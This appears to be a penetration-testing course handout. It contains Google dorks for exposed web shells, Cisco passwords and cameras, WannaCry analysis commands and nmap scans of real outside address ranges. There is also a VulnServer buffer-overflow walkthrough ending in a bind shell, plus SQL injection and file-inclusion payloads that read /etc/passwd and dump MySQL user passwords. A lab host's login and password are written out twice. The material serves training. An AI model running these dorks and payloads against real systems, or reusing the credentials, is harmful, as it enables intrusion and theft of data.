# Offensive/Defensive Cyber                         #

Here are some Google hacking queries to practice.

-----------------------

big brother status green

############

# r57shell #

############

inurl:r57 intext:r57 cpu+mem+phpini+phpinfo intitle:r57shell		

r57 "[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]"

c99 "[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]"

#########

# Cisco #

#########

filetype:cfg intext: "enable password" cisco

inurl:"NetworkConfiguration" cisco

inurl:"ccmuser" intext:cisco

inurl:"ccmuser/logon.asp"

inurl:-cfg intext:"enable password"

inurl:"level/15/exec/-/show"

intitle:Cisco Systems, Inc VPN 3000 Concentrator

###########

# Windows #

###########

filetype:pwd inurl:"/service.pwd"

ext:ica intext:Password

ext:reg "Terminal Server Client"

###########

# Cameras #

###########

inurl:"ViewerFrame?Mode="

inurl:home/homej.html intitle:snc

inurl:home/homea.html intitle:snc

intitle:flexwatch intext:"Home page ver"

(intext:"MOBOTIX M1" | intext:"MOBOTIX M10") intext:"Open Menu" Shift-Reload 

intitle:"Live View / - AXIS" | inurl:view/view.sht 

------------------------------------------------------------------------------------------------------------------------------------

Host Name:          107.191.39.106

username:           ocodco

password:           ocodco123!!!         

pe info wannacry.exe

pe check wannacry.exe

pe dump --section text wannacry.exe

pe dump --section data wannacry.exe

pe dump --section rsrc wannacry.exe

pe dump --section reloc wannacry.exe

strings rdata | less

strings rsrc | less

strings text | less

nano am.py

python3 am.py wannacry.exe

Required Technical Skills: 		Comfortable with basic Linux/Windows (MCSA/Linux+)

Job Task: 						Process security events, follow incident response triage playbook

Required Technical Skills: 		Comfortable with basic Linux/Windows system administration

Job Task: 						Perform detailed malware analysis, assist with development of the incident response triage playbook

Required Technical Skills: 		Strong statistical analysis background

Job Task: 						Perform detailed malware analysis 

#######################

# Passive Recon       #

# aka: OSINT          #

# aka: Footprinting #

#######################

- Wikipedia Page

    - Are they Public or Private?

    - Does the target have any subsidiaries?

        - Have they had any scandals?

- Robtex

    - Show system map

- Sample OSINT Report:

	https://infosecaddicts-files.s3.amazonaws.com/OSINT_Innophos.doc

- Misc

	OSINT on a hacker group:

	https://en.wikipedia.org/wiki/Anonymous_(group)

	https://en.wikipedia.org/wiki/LulzSec

	OSINT on a terrorist group:

	https://en.wikipedia.org/wiki/Al-Qaeda

	https://en.wikipedia.org/wiki/Taliban

	https://en.wikipedia.org/wiki/Islamic_State_of_Iraq_and_the_Levant

Step 1: Download Nmap

--------------------

Windows: https://nmap.org/dist/nmap-7.70-setup.exe

Mac OS X: https://nmap.org/dist/nmap-7.70.dmg

Linux:

--- Fedora/CentOS/RHEL:    sudo yum install -y nmap

--- Ubuntu/Mint/Debian:    sudo apt-get install -y nmap

########################

# Scanning Methodology #

########################

Host Name:          107.191.39.106

username:           ocodco

password:           ocodco123!!! 

- Ping Sweep

What's alive?

Note: On windows you won't need to use the word "sudo" in front of the command below:

---------------------------On Linux or Mac OS X type This-----------------------------------

sudo nmap -sP 157.166.226.*

--------------------------------------------------------------------------------------------

    -if -SP yields no results try:

Note: On windows you won't need to use the word "sudo" in front of the command below:

---------------------------On Linux or Mac OS X type This-----------------------------------

sudo nmap -sL 157.166.226.*

------------------------------------------------------------------------------------------

    -Look for hostnames:

Note: On windows you won't need to use the word "sudo" in front of the command below:

---------------------------On Linux or Mac OS X type This-----------------------------------

sudo nmap -sL 157.166.226.* | grep cnn

-------------------------------------------------------------------------------------------

- Port Scan

What's where?

Note: On windows you won't need to use the word "sudo" in front of the command below:

---------------------------On Linux or Mac OS X type This-----------------------------------

sudo nmap -sS 162.243.126.247 

--------------------------------------------------------------------------------------------

- Bannergrab/Version Query

What versions of software are running

-------------------------------------

Note: On windows you won't need to use the word "sudo" in front of the command below:

---------------------------On Linux or Mac OS X type This-----------------------------------

sudo nmap -sV 162.243.126.247

-------------------------------------------------------------------------------------------

Let's dig into this a little bit more:

-------------------------------------

Note: On windows you won't need to use the word "sudo" in front of the command below:

---------------------------On Linux or Mac OS X type This-----------------------------------

sudo nmap -sV --script=http-headers 162.243.126.247 -p 80,443

-------------------------------------------------------------------------------------------

- Vulnerability Research

Lookup the banner versions for public exploits

----------------------------------------------

http://exploit-db.com

http://securityfocus.com/bid

https://packetstormsecurity.com/files/tags/exploit/

---------------------------------------------------------------------------------------------------------------------------------

Network Penetration Testing Process (known vulnerabilities)

-----------------------------------------------------------

1. Ping Sweep:

The purpose of this step is to identify live hosts

    nmap -sP <ip-address/ip-range>

2. Port Scan

Identify running services. We use the running services to map the network topology.

    nmap -sS <ip-address/ip-range>

3. Bannergrab

Identify the version of version of software running on each port

    nmap -sV <ip-address/ip-range>

4. Vulnerability Research

Use the software version number to research and determine if it is out of date (vulnerable).

    exploit-db.com/search

Skill Level 1. Run the scanners

    Nexpose

    Qualys

    Retina

    Nessus              known vulnerabilities

    OpenVas

    Foundscan

    GFI LanGuard

    NCircle

Skill Level 2. Manual vulnerability validation (known vulnerabilities)

    windows ->  	systeminfo

    Linux->     	dpkg -l			(Debian/Ubuntu/Mint)

            		rpm -qa			(RHEL/Fedora/Centos)

	Mac OS X->		sudo find / -iname *.app

#####################################

# Quick Stack Based Buffer Overflow #

#####################################

- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)

http://45.63.104.73/ExploitLab.zip

http://45.63.104.73/nc-password-is-netcat.zip   <--- save this file to your c:\windows\system32 directory

- Extract the ExploitLab.zip file to your Desktop

- Go to folder on your desktop ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:

nc localhost 9999

--------------------------------------------------------------------------

If you don't have netcat you can download it from here:

http://45.63.104.73/nc-password-is-netcat.zip

The file nc.zip is password protected (password is 'password'), you'll have to exclude it from your anti-virus and either add it to your PATH, or copy it to your c:\Windows\System32\ folder.

- In the new command prompt window where you ran nc type:

HELP

- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts

- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++

- Now double-click on 1-simplefuzzer.py

- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.

- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py

- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py

- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)

- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

5-2006char-eip-check.py

- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242

6-jmp-esp.py

- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll

7-first-exploit

- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.

Skill Level 3. Identify unknown vulnerabilities

-----------------------------------------------

- App Type

    Stand Alone             Client Server               Web App

                        ***(vulnerserver.exe)***

- Input TYpe

-------------

    FIle                    logical network port            Browser

    Keyboard

    Mouse

                        ***(9999)***

- Map & Fuzz app entry points:

    - Commands              ***(commands)***

    - Methods

    - Verbs

    - functions

    - subroutines

    - controllers

- Isolate the crash

-------------------

App seems to reliably crash at TRUN 2100

- Calculate the distance to EIP

Distance to EIP is 2006

We found that EIP was populated with the value: 396F4338

396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern

An online tool that we can use for this is:

https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html

- Redirect Program Execution

----------------------------

A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.

We learned that we control EAX and ESP in script 2.

- Implement Shellcode

---------------------

There are only 2 things that can go wrong with shellcode:

- Not enough space

- Bad characters

#######################################################

# Open the following web links below as tabs          #

# For each web link answer all of the questions below #

#######################################################

https://www.exploit-db.com/exploits/46762

https://www.exploit-db.com/exploits/46070

https://www.exploit-db.com/exploits/40713

https://www.exploit-db.com/exploits/46458

https://www.exploit-db.com/exploits/40712

https://www.exploit-db.com/exploits/40714

https://www.exploit-db.com/exploits/40680

https://www.exploit-db.com/exploits/40673

https://www.exploit-db.com/exploits/40681

https://www.exploit-db.com/exploits/37731

https://www.exploit-db.com/exploits/31254

https://www.exploit-db.com/exploits/31255

https://www.exploit-db.com/exploits/27703

https://www.exploit-db.com/exploits/27277

https://www.exploit-db.com/exploits/26495

https://www.exploit-db.com/exploits/24557

https://www.exploit-db.com/exploits/39417

https://www.exploit-db.com/exploits/23243

                      ###############################

###################### # Class Exploit Dev Quiz Task # ######################

                      ###############################

EID number:

1. Vulnerable Software Info

    a- Product Name

    b- Software version

    c- Available for download

2. Target platform

    a- OS Name								(ex: Windows XP)

    b- Service pack							(ex: SP3)

    c- Language pack						(ex: English)

3. Exploit info

    a- modules imported                     (ex: sys, re, os)

    b- application entry point              (ex: TRUN)

    c- distance to EIP                      (ex: 2006)

    d- how is code redirection done         (ex: JMP ESP, JMP ESI)

    e- number of NOPs                       (ex: 10 * \x90  = 10 NOPs)

    f- length of shellcode					(ex: 368)

    g- bad characters                       (ex: \x0a\x00\x0d)

    h- is the target ip hard-coded

    i- what does the shellcode do           (ex: bind shell, reverse shell, calc)

    j- what is the total buffer length

    k- does the exploit do anything to ensure the buffer doesn't exceed a certain length

    l- Is this a server side or client-side exploit

# FreeFloat FTP Server Exploit Analysis #

Analyze the following exploit code:

https://www.exploit-db.com/exploits/15689/

1. What is the target platform that this exploit works against?

2. What is the variable name for the distance to EIP?

3. What is the actual distance to EIP in bytes?

4. Describe what is happening in the variable ‘junk2’

Analysis of the training walk-through based on EID: 15689:

http://45.63.104.73/ff.zip

ff1.py

1. What does the sys module do?

2. What is sys.argv[1] and sys.argv[2]?

3. What application entry point is being attacked in this script?

ff2.py

1. Explain what is happening in lines 18 - 20 doing.

2. What is pattern_create.rb doing and where can I find it?

3. Why can’t I just double click the file to run this script?

ff3.py

1. Explain what is happening in lines 17 - to 25?

2. Explain what is happening in lines 30 - to 32?

3. Why is everything below line 35 commented out?

ff4.py

1. Explain what is happening in lines 13 to 15.

2. Explain what is happening in line 19.

3. What is the total length of buff?

ff5.py

1. Explain what is happening in line 15.

2. What is struct.pack?

3. How big is the shellcode in this script?

ff6.py

1. What is the distance to EIP?

2. How big is the shellcode in this script?

3. What is the total byte length of the data being sent to this app?

ff7.py

1. What is a tuple in python?

2. How big is the shellcode in this script?

3. Did your app crash in from this script?

ff8.py

1. How big is the shellcode in this script?

2. What is try/except in python?

3. What is socket.SOCK_STREAM in Python?

ff9.py

1. What is going on in lines 19 and 20?

2. What is the length of the NOPs?

3. From what DLL did the address of the JMP ESP come from?

ff010.py

1. What is going on in lines 18 - 20?

2. What is going on in lines 29 - 32?

3. How would a stack adjustment help this script?

# Offensive Cyber Operations Job Roles  #

# Offensive Cyber Level 1               #

Required Technical Skills: 		Comfortable with basic Linux/Windows (MCSA/Linux+)

Job Task: 						Run network security scanners and assist with documentation of known vulnerabilities

Tools Used:

								Nmap

    							Nexpose

    							Qualys

    							Retina

    							Nessus              known vulnerabilities

    							OpenVas

    							Foundscan

    							GFI LanGuard

    							NCircle

# Offensive Cyber Operations Job Roles  #

# Offensive Cyber Level 2               #

Required Technical Skills: 		Comfortable with basic Linux/Windows system administration

Job Task: 						Run network security scanners and assist with document of known vulnerabilities

								Perform manual vulnerability validation

								Analyze public exploit and develop threat analysis reports

								Assess simple applications for vulnerabilities

# Offensive Cyber Level 3               #

Required Technical Skills: 		Strong programming background (C, C++, Java, Assembly, scripting languages)

Job Task: 						Perform manual vulnerability validation

								Analyze public exploit and develop threat analysis reports

								Assess complex applications for vulnerabilities

# Basic: Web Application Testing #

Most people are going to tell you reference the OWASP Testing guide.

https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.

The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.

    1. Does the website talk to a DB?

        - Look for parameter passing (ex: site.com/page.php?id=4)

        - If yes - try SQL Injection

    2. Can I or someone else see what I type?

        - If yes - try XSS

    3. Does the page reference a file?

        - If yes - try LFI/RFI

Let's start with some manual testing against 45.63.104.73

#######################

# Attacking PHP/MySQL #

#######################

Go to LAMP Target homepage

http://45.63.104.73/

Clicking on the Acer Link:

http://45.63.104.73/acre2.php?lap=acer

   - Found parameter passing (answer yes to question 1)

   - Insert ' to test for SQLI

http://45.63.104.73/acre2.php?lap=acer'

Page returns the following error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1

In order to perform union-based sql injection - we must first determine the number of columns in this query.

We do this using the ORDER BY

http://45.63.104.73/acre2.php?lap=acer' order by 100-- +

Page returns the following error:

Unknown column '100' in 'order clause'

http://45.63.104.73/acre2.php?lap=acer' order by 50-- +

Page returns the following error:

Unknown column '50' in 'order clause'

http://45.63.104.73/acre2.php?lap=acer' order by 25-- +

Page returns the following error:

Unknown column '25' in 'order clause'

http://45.63.104.73/acre2.php?lap=acer' order by 12-- +

Page returns the following error:

Unknown column '12' in 'order clause'

http://45.63.104.73/acre2.php?lap=acer' order by 6-- +

---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns

Now we build out the union all select statement with the correct number of columns

http://www.techonthenet.com/sql/union.php

http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +

Now we negate the parameter value 'acer' by turning into the word 'null':

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j

We see that a 4 and a 5 are on the screen. These are the columns that will echo back data

Use a cheat sheet for syntax:

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a

########################

# Question I get a lot #

########################

Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.

Here is a good reference for it:

https://www.symantec.com/connect/blogs/mysql-injection-comments-comments

Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.

#########################

# File Handling Attacks #

#########################

Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)

http://45.63.104.73/showfile.php?filename=about.txt

See if you can read files on the file system:

http://45.63.104.73/showfile.php?filename=/etc/passwd

We call this attack a Local File Include or LFI.

Now let's find some text out on the internet somewhere:

https://www.gnu.org/software/hello/manual/hello.txt

Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:

http://45.63.104.73/showfile.php?filename=https://www.gnu.org/software/hello/manual/hello.txt

#########################################################################################

# SQL Injection                                                                         #

# http://45.63.104.73/1-Intro_To_SQL_Intection.pptx #

#########################################################################################

- Another quick way to test for SQLI is to remove the paramter value

# Error-Based SQL Injection #

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--     NOTE: "N" - just means to keep going until you run out of databases

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--

# Union-Based SQL Injection #